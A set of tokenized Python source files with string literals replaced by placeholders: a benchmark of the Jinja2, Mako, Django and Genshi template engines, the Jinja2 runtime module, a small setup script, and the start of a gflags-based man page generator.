<s> """<STR_LIT>""" <EOL> import sys <EOL> from os . path import join , dirname , abspath <EOL> try : <EOL> from cProfile import Profile <EOL> except ImportError : <EOL> from profile import Profile <EOL> from pstats import Stats <EOL> ROOT = abspath ( dirname ( __file__ ) ) <EOL> from random import choice , randrange <EOL> from datetime import datetime <EOL> from timeit import Timer <EOL> from jinja2 import Environment , FileSystemLoader <EOL> from jinja2 . utils import generate_lorem_ipsum <EOL> from mako . lookup import TemplateLookup <EOL> from genshi . template import TemplateLoader as GenshiTemplateLoader <EOL> def dateformat ( x ) : <EOL> return x . strftime ( '<STR_LIT>' ) <EOL> jinja_env = Environment ( loader = FileSystemLoader ( join ( ROOT , '<STR_LIT>' ) ) ) <EOL> jinja_env . filters [ '<STR_LIT>' ] = dateformat <EOL> mako_lookup = TemplateLookup ( directories = [ join ( ROOT , '<STR_LIT>' ) ] ) <EOL> genshi_loader = GenshiTemplateLoader ( [ join ( ROOT , '<STR_LIT>' ) ] ) <EOL> class Article ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> self . href = '<STR_LIT>' % self . id <EOL> self . title = generate_lorem_ipsum ( <NUM_LIT:1> , False , <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> self . user = choice ( users ) <EOL> self . body = generate_lorem_ipsum ( ) <EOL> self . pub_date = datetime . utcfromtimestamp ( randrange ( <NUM_LIT:10> ** <NUM_LIT:9> , <NUM_LIT:2> * <NUM_LIT:10> ** <NUM_LIT:9> ) ) <EOL> self . published = True <EOL> class User ( object ) : <EOL> def __init__ ( self , username ) : <EOL> self . href = '<STR_LIT>' % username <EOL> self . username = username <EOL> users = map ( User , [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> articles = map ( Article , range ( <NUM_LIT:20> ) ) <EOL> navigation = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] * <NUM_LIT:5> <EOL> context = dict ( users = users , articles = articles , page_navigation = navigation ) <EOL> jinja_template = jinja_env . get_template ( '<STR_LIT>' ) <EOL> mako_template = mako_lookup . get_template ( '<STR_LIT>' ) <EOL> genshi_template = genshi_loader . load ( '<STR_LIT>' ) <EOL> def test_jinja ( ) : <EOL> jinja_template . render ( context ) <EOL> def test_mako ( ) : <EOL> mako_template . render_unicode ( ** context ) <EOL> from djangoext import django_loader , DjangoContext <EOL> def test_django ( ) : <EOL> django_template = django_loader . get_template ( '<STR_LIT>' ) <EOL> django_template . render ( DjangoContext ( context ) ) <EOL> def test_genshi ( ) : <EOL> genshi_template . generate ( ** context ) . render ( '<STR_LIT:html>' , doctype = '<STR_LIT:html>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> for test in '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' : <EOL> t = Timer ( setup = '<STR_LIT>' % test , <EOL> stmt = '<STR_LIT>' ) <EOL> sys . stdout . write ( '<STR_LIT>' % test ) <EOL> sys . stdout . flush ( ) <EOL> sys . stdout . write ( '<STR_LIT>' % ( test , t . timeit ( number = <NUM_LIT:200> ) / <NUM_LIT:200> ) ) <EOL> if '<STR_LIT>' in sys . argv : <EOL> print '<STR_LIT>' <EOL> p = Profile ( ) <EOL> p . runcall ( test_jinja ) <EOL> stats = Stats ( p ) <EOL> stats . sort_stats ( '<STR_LIT:time>' , '<STR_LIT>' ) <EOL> stats . print_stats ( ) </s>
<s> """<STR_LIT>""" <EOL> from itertools import chain , imap <EOL> from jinja2 . nodes import EvalContext , _context_function_types <EOL> from jinja2 . utils import Markup , partial , soft_unicode , escape , missing , concat , internalcode , next , object_type_repr <EOL> from jinja2 . exceptions import UndefinedError , TemplateRuntimeError , TemplateNotFound <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> to_string = unicode <EOL> identity = lambda x : x <EOL> def markup_join ( seq ) : <EOL> """<STR_LIT>""" <EOL> buf = [ ] <EOL> iterator = imap ( soft_unicode , seq ) <EOL> for arg in iterator : <EOL> buf . append ( arg ) <EOL> if hasattr ( arg , '<STR_LIT>' ) : <EOL> return Markup ( u'<STR_LIT>' ) . join ( chain ( buf , iterator ) ) <EOL> return concat ( buf ) <EOL> def unicode_join ( seq ) : <EOL> """<STR_LIT>""" <EOL> return concat ( imap ( unicode , seq ) ) <EOL> def new_context ( environment , template_name , blocks , vars = None , <EOL> shared = None , globals = None , locals = None ) : <EOL> """<STR_LIT>""" <EOL> if vars is None : <EOL> vars = { } <EOL> if shared : <EOL> parent = vars <EOL> else : <EOL> parent = dict ( globals or ( ) , ** vars ) <EOL> if locals : <EOL> if shared : <EOL> parent = dict ( parent ) <EOL> for key , value in locals . iteritems ( ) : <EOL> if key [ : <NUM_LIT:2> ] == '<STR_LIT>' and value is not missing : <EOL> parent [ key [ <NUM_LIT:2> : ] ] = value <EOL> return Context ( environment , parent , template_name , blocks ) <EOL> class TemplateReference ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , context ) : <EOL> self . __context = context <EOL> def __getitem__ ( self , name ) : <EOL> blocks = self . __context . blocks [ name ] <EOL> return BlockReference ( name , self . __context , blocks , <NUM_LIT:0> ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . __context . name <EOL> ) <EOL> class Context ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , environment , parent , name , blocks ) : <EOL> self . parent = parent <EOL> self . vars = { } <EOL> self . environment = environment <EOL> self . eval_ctx = EvalContext ( self . environment , name ) <EOL> self . exported_vars = set ( ) <EOL> self . name = name <EOL> self . blocks = dict ( ( k , [ v ] ) for k , v in blocks . iteritems ( ) ) <EOL> def super ( self , name , current ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> blocks = self . blocks [ name ] <EOL> index = blocks . index ( current ) + <NUM_LIT:1> <EOL> blocks [ index ] <EOL> except LookupError : <EOL> return self . environment . undefined ( '<STR_LIT>' <EOL> '<STR_LIT>' % name , <EOL> name = '<STR_LIT>' ) <EOL> return BlockReference ( name , self , blocks , index ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def resolve ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key in self . vars : <EOL> return self . vars [ key ] <EOL> if key in self . parent : <EOL> return self . parent [ key ] <EOL> return self . environment . undefined ( name = key ) <EOL> def get_exported ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( k , self . vars [ k ] ) for k in self . exported_vars ) <EOL> def get_all ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( self . parent , ** self . vars ) <EOL> @ internalcode <EOL> def call ( __self , __obj , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if __debug__ : <EOL> __traceback_hide__ = True <EOL> if isinstance ( __obj , _context_function_types ) : <EOL> if getattr ( __obj , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> args = ( __self , ) + args <EOL> elif getattr ( __obj , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> args = ( __self . eval_ctx , ) + args <EOL> elif getattr ( __obj , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> args = ( __self . environment , ) + args <EOL> try : <EOL> return __obj ( * args , ** kwargs ) <EOL> except StopIteration : <EOL> return __self . environment . undefined ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def derived ( self , locals = None ) : <EOL> """<STR_LIT>""" <EOL> context = new_context ( self . environment , self . name , { } , <EOL> self . parent , True , None , locals ) <EOL> context . vars . update ( self . vars ) <EOL> context . eval_ctx = self . eval_ctx <EOL> context . blocks . update ( ( k , list ( v ) ) for k , v in self . blocks . iteritems ( ) ) <EOL> return context <EOL> def _all ( meth ) : <EOL> proxy = lambda self : getattr ( self . get_all ( ) , meth ) ( ) <EOL> proxy . __doc__ = getattr ( dict , meth ) . __doc__ <EOL> proxy . __name__ = meth <EOL> return proxy <EOL> keys = _all ( '<STR_LIT>' ) <EOL> values = _all ( '<STR_LIT>' ) <EOL> items = _all ( '<STR_LIT>' ) <EOL> if hasattr ( dict , '<STR_LIT>' ) : <EOL> iterkeys = _all ( '<STR_LIT>' ) <EOL> itervalues = _all ( '<STR_LIT>' ) <EOL> iteritems = _all ( '<STR_LIT>' ) <EOL> del _all <EOL> def __contains__ ( self , name ) : <EOL> return name in self . vars or name in self . parent <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> item = self . resolve ( key ) <EOL> if isinstance ( item , Undefined ) : <EOL> raise KeyError ( key ) <EOL> return item <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> repr ( self . get_all ( ) ) , <EOL> self . name <EOL> ) <EOL> try : <EOL> from collections import Mapping <EOL> Mapping . register ( Context ) <EOL> except ImportError : <EOL> pass <EOL> class BlockReference ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , context , stack , depth ) : <EOL> self . name = name <EOL> self . _context = context <EOL> self . _stack = stack <EOL> self . _depth = depth <EOL> @ property <EOL> def super ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _depth + <NUM_LIT:1> >= len ( self . _stack ) : <EOL> return self . _context . environment . undefined ( '<STR_LIT>' % <EOL> self . name , name = '<STR_LIT>' ) <EOL> return BlockReference ( self . name , self . _context , self . _stack , <EOL> self . _depth + <NUM_LIT:1> ) <EOL> @ internalcode <EOL> def __call__ ( self ) : <EOL> rv = concat ( self . _stack [ self . _depth ] ( self . _context ) ) <EOL> if self . _context . eval_ctx . autoescape : <EOL> rv = Markup ( rv ) <EOL> return rv <EOL> class LoopContext ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , iterable , recurse = None ) : <EOL> self . _iterator = iter ( iterable ) <EOL> self . _recurse = recurse <EOL> self . index0 = - <NUM_LIT:1> <EOL> try : <EOL> self . _length = len ( iterable ) <EOL> except ( TypeError , AttributeError ) : <EOL> self . _length = None <EOL> def cycle ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> if not args : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> return args [ self . index0 % len ( args ) ] <EOL> first = property ( lambda x : x . index0 == <NUM_LIT:0> ) <EOL> last = property ( lambda x : x . index0 + <NUM_LIT:1> == x . length ) <EOL> index = property ( lambda x : x . index0 + <NUM_LIT:1> ) <EOL> revindex = property ( lambda x : x . length - x . index0 ) <EOL> revindex0 = property ( lambda x : x . length - x . index ) <EOL> def __len__ ( self ) : <EOL> return self . length <EOL> def __iter__ ( self ) : <EOL> return LoopContextIterator ( self ) <EOL> @ internalcode <EOL> def loop ( self , iterable ) : <EOL> if self . _recurse is None : <EOL> raise TypeError ( '<STR_LIT>' <EOL> "<STR_LIT>" ) <EOL> return self . _recurse ( iterable , self . _recurse ) <EOL> __call__ = loop <EOL> del loop <EOL> @ property <EOL> def length ( self ) : <EOL> if self . _length is None : <EOL> iterable = tuple ( self . _iterator ) <EOL> self . _iterator = iter ( iterable ) <EOL> self . _length = len ( iterable ) + self . index0 + <NUM_LIT:1> <EOL> return self . _length <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . index , <EOL> self . length <EOL> ) <EOL> class LoopContextIterator ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , ) <EOL> def __init__ ( self , context ) : <EOL> self . context = context <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> ctx = self . context <EOL> ctx . index0 += <NUM_LIT:1> <EOL> return next ( ctx . _iterator ) , ctx <EOL> class Macro ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , environment , func , name , arguments , defaults , <EOL> catch_kwargs , catch_varargs , caller ) : <EOL> self . _environment = environment <EOL> self . _func = func <EOL> self . _argument_count = len ( arguments ) <EOL> self . name = name <EOL> self . arguments = arguments <EOL> self . defaults = defaults <EOL> self . catch_kwargs = catch_kwargs <EOL> self . catch_varargs = catch_varargs <EOL> self . caller = caller <EOL> @ internalcode <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> arguments = list ( args [ : self . _argument_count ] ) <EOL> off = len ( arguments ) <EOL> if off != self . _argument_count : <EOL> for idx , name in enumerate ( self . arguments [ len ( arguments ) : ] ) : <EOL> try : <EOL> value = kwargs . pop ( name ) <EOL> except KeyError : <EOL> try : <EOL> value = self . defaults [ idx - self . _argument_count + off ] <EOL> except IndexError : <EOL> value = self . _environment . undefined ( <EOL> '<STR_LIT>' % name , name = name ) <EOL> arguments . append ( value ) <EOL> if self . caller : <EOL> caller = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if caller is None : <EOL> caller = self . _environment . undefined ( '<STR_LIT>' , <EOL> name = '<STR_LIT>' ) <EOL> arguments . append ( caller ) <EOL> if self . catch_kwargs : <EOL> arguments . append ( kwargs ) <EOL> elif kwargs : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( self . name , next ( iter ( kwargs ) ) ) ) <EOL> if self . catch_varargs : <EOL> arguments . append ( args [ self . _argument_count : ] ) <EOL> elif len ( args ) > self . _argument_count : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( self . name , len ( self . arguments ) ) ) <EOL> return self . _func ( * arguments ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . name is None and '<STR_LIT>' or repr ( self . name ) <EOL> ) <EOL> class Undefined ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def __init__ ( self , hint = None , obj = missing , name = None , exc = UndefinedError ) : <EOL> self . _undefined_hint = hint <EOL> self . _undefined_obj = obj <EOL> self . _undefined_name = name <EOL> self . _undefined_exception = exc <EOL> @ internalcode <EOL> def _fail_with_undefined_error ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . _undefined_hint is None : <EOL> if self . _undefined_obj is missing : <EOL> hint = '<STR_LIT>' % self . _undefined_name <EOL> elif not isinstance ( self . _undefined_name , basestring ) : <EOL> hint = '<STR_LIT>' % ( <EOL> object_type_repr ( self . _undefined_obj ) , <EOL> self . _undefined_name <EOL> ) <EOL> else : <EOL> hint = '<STR_LIT>' % ( <EOL> object_type_repr ( self . _undefined_obj ) , <EOL> self . _undefined_name <EOL> ) <EOL> else : <EOL> hint = self . _undefined_hint <EOL> raise self . _undefined_exception ( hint ) <EOL> @ internalcode <EOL> def __getattr__ ( self , name ) : <EOL> if name [ : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> raise AttributeError ( name ) <EOL> return self . _fail_with_undefined_error ( ) <EOL> __add__ = __radd__ = __mul__ = __rmul__ = __div__ = __rdiv__ = __truediv__ = __rtruediv__ = __floordiv__ = __rfloordiv__ = __mod__ = __rmod__ = __pos__ = __neg__ = __call__ = __getitem__ = __lt__ = __le__ = __gt__ = __ge__ = __int__ = __float__ = __complex__ = __pow__ = __rpow__ = _fail_with_undefined_error <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> if <NUM_LIT:0> : <EOL> yield None <EOL> def __nonzero__ ( self ) : <EOL> return False <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' <EOL> class DebugUndefined ( Undefined ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> def __unicode__ ( self ) : <EOL> if self . _undefined_hint is None : <EOL> if self . _undefined_obj is missing : <EOL> return u'<STR_LIT>' % self . _undefined_name <EOL> return '<STR_LIT>' % ( <EOL> object_type_repr ( self . _undefined_obj ) , <EOL> self . _undefined_name <EOL> ) <EOL> return u'<STR_LIT>' % self . _undefined_hint <EOL> class StrictUndefined ( Undefined ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> __iter__ = __unicode__ = __str__ = __len__ = __nonzero__ = __eq__ = __ne__ = __bool__ = Undefined . _fail_with_undefined_error <EOL> del Undefined . __slots__ , DebugUndefined . __slots__ , StrictUndefined . __slots__ </s>
<s> from distutils . core import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = '''<STR_LIT>''' , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import sys <EOL> import stat <EOL> import time <EOL> import gflags <EOL> _VERSION = '<STR_LIT>' <EOL> def _GetDefaultDestDir ( ) : <EOL> home = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> homeman = os . path . join ( home , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if home and os . path . exists ( homeman ) : <EOL> return homeman <EOL> else : <EOL> return os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS = gflags . FLAGS <EOL> gflags . DEFINE_string ( '<STR_LIT>' , _GetDefaultDestDir ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> gflags . DEFINE_integer ( '<STR_LIT:v>' , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> _MIN_VALID_USAGE_MSG = <NUM_LIT:9> <EOL> class Logging : <EOL> """<STR_LIT>""" <EOL> def error ( self , msg ) : print >> sys . stderr , "<STR_LIT>" , msg <EOL> def warn ( self , msg ) : print >> sys . stderr , "<STR_LIT>" , msg <EOL> def info ( self , msg ) : print msg <EOL> def debug ( self , msg ) : self . vlog ( <NUM_LIT:1> , msg ) <EOL> def vlog ( self , level , msg ) : <EOL> if FLAGS . v >= level : print msg <EOL> logging = Logging ( ) <EOL> class App : <EOL> def usage ( self , shorthelp = <NUM_LIT:0> ) : <EOL> print >> sys . stderr , __doc__ <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> print >> sys . stderr , str ( FLAGS ) <EOL> def run ( self ) : <EOL> main ( sys . argv ) <EOL> app = App ( ) <EOL> def GetRealPath ( filename ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isabs ( filename ) : <EOL> return filename <EOL> if filename . startswith ( '<STR_LIT>' ) or filename . startswith ( '<STR_LIT>' ) : <EOL> return os . path . abspath ( filename ) <EOL> path = os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for directory in path . split ( '<STR_LIT::>' ) : <EOL> tryname = os . path . join ( directory , filename ) <EOL> if os . path . exists ( tryname ) : <EOL> if not os . path . isabs ( directory ) : <EOL> return os . path . abspath ( tryname ) <EOL> return tryname <EOL> if os . path . exists ( filename ) : <EOL> return os . path . abspath ( filename ) <EOL> return None <EOL> class Flag ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , flag_desc , help ) : <EOL> """<STR_LIT>""" <EOL> self . desc = flag_desc <EOL> self . help = help <EOL> self . default = '<STR_LIT>' <EOL> self . tips = '<STR_LIT>' <EOL> class ProgramInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> module_py_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_py_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_default_py_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_tips_py_re = re . compile ( r'<STR_LIT>' ) <EOL> module_c_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_c_re = re . compile ( r'<STR_LIT>' ) <EOL> module_java_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_java_re = re . compile ( r'<STR_LIT>' ) <EOL> def __init__ ( self , executable ) : <EOL> """<STR_LIT>""" <EOL> self . long_name = executable <EOL> self . name = os . path . basename ( executable ) <EOL> ( self . short_name , self . ext ) = os . path . splitext ( self . name ) <EOL> self . executable = GetRealPath ( executable ) <EOL> self . output = [ ] <EOL> self . desc = [ ] <EOL> self . modules = { } <EOL> self . module_list = [ ] <EOL> self . date = time . localtime ( time . time ( ) ) <EOL> def Run ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . executable : <EOL> logging . error ( '<STR_LIT>' % self . long_name ) <EOL> return <NUM_LIT:0> <EOL> finfo = os . stat ( self . executable ) <EOL> self . date = time . localtime ( finfo [ stat . ST_MTIME ] ) <EOL> logging . info ( '<STR_LIT>' <EOL> % ( self . executable , FLAGS . help_flag ) ) <EOL> ( child_stdin , child_stdout_and_stderr ) = os . popen4 ( <EOL> [ self . executable , FLAGS . help_flag ] ) <EOL> child_stdin . close ( ) <EOL> self . output = child_stdout_and_stderr . readlines ( ) <EOL> child_stdout_and_stderr . close ( ) <EOL> if len ( self . output ) < _MIN_VALID_USAGE_MSG : <EOL> logging . error ( '<STR_LIT>' <EOL> % ( self . name , FLAGS . help_flag , <EOL> len ( self . output ) , self . output ) ) <EOL> return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def Parse ( self ) : <EOL> """<STR_LIT>""" <EOL> ( start_line , lang ) = self . ParseDesc ( ) <EOL> if start_line < <NUM_LIT:0> : <EOL> return <EOL> if '<STR_LIT>' == lang : <EOL> self . ParsePythonFlags ( start_line ) <EOL> elif '<STR_LIT:c>' == lang : <EOL> self . ParseCFlags ( start_line ) <EOL> elif '<STR_LIT>' == lang : <EOL> self . ParseJavaFlags ( start_line ) <EOL> def ParseDesc ( self , start_line = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> exec_mod_start = self . executable + '<STR_LIT::>' <EOL> after_blank = <NUM_LIT:0> <EOL> start_line = <NUM_LIT:0> <EOL> for start_line in range ( start_line , len ( self . output ) ) : <EOL> line = self . output [ start_line ] . rstrip ( ) <EOL> if ( '<STR_LIT>' == line <EOL> and len ( self . output ) > start_line + <NUM_LIT:1> <EOL> and '<STR_LIT>' == self . output [ start_line + <NUM_LIT:1> ] . rstrip ( ) ) : <EOL> start_line += <NUM_LIT:2> <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> return ( start_line , '<STR_LIT>' ) <EOL> if exec_mod_start == line : <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> return ( start_line , '<STR_LIT>' ) <EOL> if after_blank and line . startswith ( '<STR_LIT>' ) : <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> return ( start_line , '<STR_LIT:c>' ) <EOL> if line == '<STR_LIT>' : <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> start_line += <NUM_LIT:2> <EOL> return ( start_line , '<STR_LIT>' ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> self . desc . append ( line ) <EOL> after_blank = ( line == '<STR_LIT>' ) <EOL> else : <EOL> logging . warn ( '<STR_LIT>' <EOL> % self . long_name ) <EOL> return ( - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> def ParsePythonFlags ( self , start_line = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> modname = None <EOL> modlist = [ ] <EOL> flag = None <EOL> for line_num in range ( start_line , len ( self . output ) ) : <EOL> line = self . output [ line_num ] . rstrip ( ) <EOL> if not line : <EOL> continue <EOL> mobj = self . module_py_re . match ( line ) <EOL> if mobj : <EOL> modname = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> self . module_list . append ( modname ) <EOL> self . modules . setdefault ( modname , [ ] ) <EOL> modlist = self . modules [ modname ] <EOL> flag = None <EOL> continue <EOL> mobj = self . flag_py_re . match ( line ) <EOL> if mobj : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> flag = Flag ( mobj . group ( <NUM_LIT:1> ) , mobj . group ( <NUM_LIT:2> ) ) <EOL> continue <EOL> if not flag : <EOL> logging . error ( '<STR_LIT>' % line ) <EOL> mobj = self . flag_default_py_re . match ( line ) <EOL> if mobj : <EOL> flag . default = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> continue <EOL> mobj = self . flag_tips_py_re . match ( line ) <EOL> if mobj : <EOL> flag . tips = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> continue <EOL> if flag and flag . help : <EOL> flag . help += line <EOL> else : <EOL> logging . info ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> def ParseCFlags ( self , start_line = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> modname = None <EOL> modlist = [ ] <EOL> flag = None <EOL> for line_num in range ( start_line , len ( self . output ) ) : <EOL> line = self . output [ line_num ] . rstrip ( ) <EOL> if not line : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> flag = None <EOL> continue <EOL> mobj = self . module_c_re . match ( line ) <EOL> if mobj : <EOL> modname = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> self . module_list . append ( modname ) <EOL> self . modules . setdefault ( modname , [ ] ) <EOL> modlist = self . modules [ modname ] <EOL> flag = None <EOL> continue <EOL> mobj = self . flag_c_re . match ( line ) <EOL> if mobj : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> flag = Flag ( mobj . group ( <NUM_LIT:1> ) , mobj . group ( <NUM_LIT:2> ) ) <EOL> continue <EOL> if flag : <EOL> flag . help += '<STR_LIT:U+0020>' + line . strip ( ) <EOL> else : <EOL> logging . info ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> def ParseJavaFlags ( self , start_line = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> modname = '<STR_LIT>' <EOL> self . module_list . append ( modname ) <EOL> self . modules . setdefault ( modname , [ ] ) <EOL> modlist = self . modules [ modname ] <EOL> flag = None <EOL> for line_num in range ( start_line , len ( self . output ) ) : <EOL> line = self . output [ line_num ] . rstrip ( ) <EOL> logging . vlog ( <NUM_LIT:2> , '<STR_LIT>' % line ) <EOL> if not line : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> flag = None <EOL> continue <EOL> mobj = self . module_java_re . match ( line ) <EOL> if mobj : <EOL> modname = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> self . module_list . append ( modname ) <EOL> self . modules . setdefault ( modname , [ ] ) <EOL> modlist = self . modules [ modname ] <EOL> flag = None <EOL> continue <EOL> mobj = self . flag_java_re . match ( line ) <EOL> if mobj : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> flag = Flag ( mobj . group ( <NUM_LIT:1> ) , mobj . group ( <NUM_LIT:2> ) ) <EOL> continue <EOL> if flag : <EOL> flag . help += '<STR_LIT:U+0020>' + line . strip ( ) <EOL> else : <EOL> logging . info ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> def Filter ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . desc : <EOL> self . short_desc = '<STR_LIT>' <EOL> return <EOL> for i in range ( len ( self . desc ) ) : <EOL> if self . desc [ i ] . find ( self . executable ) >= <NUM_LIT:0> : <EOL> self . desc [ i ] = self . desc [ i ] . replace ( self . executable , self . name ) <EOL> self . short_desc = self . desc [ <NUM_LIT:0> ] <EOL> word_list = self . short_desc . split ( '<STR_LIT:U+0020>' ) <EOL> all_names = [ self . name , self . short_name , ] <EOL> while word_list and ( word_list [ <NUM_LIT:0> ] in all_names <EOL> or word_list [ <NUM_LIT:0> ] . lower ( ) in all_names ) : <EOL> del word_list [ <NUM_LIT:0> ] <EOL> self . short_desc = '<STR_LIT>' <EOL> if not self . short_desc and word_list : <EOL> self . short_desc = '<STR_LIT:U+0020>' . join ( word_list ) <EOL> class GenerateDoc ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , proginfo , directory = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> self . info = proginfo <EOL> self . dirname = directory <EOL> def Output ( self ) : <EOL> """<STR_LIT>""" <EOL> self . Open ( ) <EOL> self . Header ( ) <EOL> self . Body ( ) <EOL> self . Footer ( ) <EOL> def Open ( self ) : raise NotImplementedError <EOL> def Header ( self ) : raise NotImplementedError 